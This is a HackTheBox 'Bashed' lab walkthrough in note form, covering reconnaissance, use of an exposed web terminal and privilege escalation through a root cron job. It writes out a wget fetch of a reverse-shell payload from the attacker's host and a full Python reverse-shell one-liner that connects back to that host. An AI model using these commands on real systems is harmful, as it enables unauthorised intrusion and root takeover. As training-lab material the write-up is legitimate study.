Bashed
Last updated
Was this helpful?
Last updated
Was this helpful?
HTB 8. Bashed
nmap -A -T4 -p- 10.10.10.68
shows port 80 with Apache httpd 2.4.18 (Ubuntu)
.
searchsploit apache 2.4
reveals local apache_ctl
exploit.
Going to website 10.10.10.68
and looking at content shows that 10.10.10.68/uploads
. exists.
dirbuster
time with medium wordlist which reveals several folders.
View source code of pages shows nothing.
dirbuster
found dev/phpbash.php
.
Go to 10.10.10.68
and launch phpbash.php
which launches web terminal.
whoami
is www-data
so lets get the user flag. cat /home/arrexel/user.txt
.
test sudo -l
and history
which shows we can become scriptmanager
user without password.
Can't change to scriptmanager
because we are in a wbeshell without a tty.
cd /var/www/html/uploads/
and upload payload.
Lets try from pentestmonkey instead of metasploit. Download and extract.
Edit the $ip
and $port
to our ip and port 1234
.
Start web server python -m SimpleHTTPServer 80
and run wet http://10.10.14.21/rev.php
on the target.
Start netcat nc -nvlp 1234
Go to 10.10.10.68/uploads/rev.php
to execute and connect.
Still can't access tty so serach for tty escape
and go to to .
Just go down the list and try the options. Try python -c 'import pty; pty.spawn("/bin/bash")'
and no we are in bash
.
sudo su scriptmanager
does not work so lets try running a command as the user sudo -u scriptmanager /bin/bash
.
whoami
is scripmanager
and history
is none.
ls -la /
shows scriptmanager
owns /scripts
.
cd scripts
and ls -la
shows test.py
and test.txt
.
The time modified for the test.txt
changes every minute so a cronjob is running the test.py
evvery minute as root. Lets change the test.py
so it performs malicious actions.
Search for python reverse shell
and use the .
Use import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.21",2345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);
(-i
is interactive mode) and download to target.
Start listening nc -nvlp 2345
and wait for shell.
Someone exploited with CVE-2017-16995
found after running the linux-exploit-suggester
.